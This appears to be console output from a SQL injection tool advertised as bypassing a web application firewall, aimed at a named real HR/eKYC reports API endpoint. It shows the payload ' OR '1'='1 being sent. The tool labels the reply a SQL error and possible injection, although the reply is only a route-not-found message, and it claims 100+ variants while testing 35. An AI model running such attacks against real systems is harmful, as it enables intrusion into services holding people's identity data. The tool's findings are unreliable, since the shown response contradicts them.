━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔥 v13.0 WAF绕过 - SQL注入100+变体自动测试
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[*] 之前v11.0测试：用了基础Payload，可能被WAF拦了
[*] 现在v13.0：AI生成100+变体，逐个测试

目标: https://hrm-api.ghtk.vn/AdHr/getEkycReports

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] 开始逐个测试（共35个变体）...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[1/35] 测试: ' OR '1'='1 → ✅✅✅ SQL错误！可能存在注入！
  响应:
{"success":false,"message":"The route AdHr\/getEkycReports could not be found.","code":1104,"errors":[]}  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ WAF绕过SQL注入测试完成
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
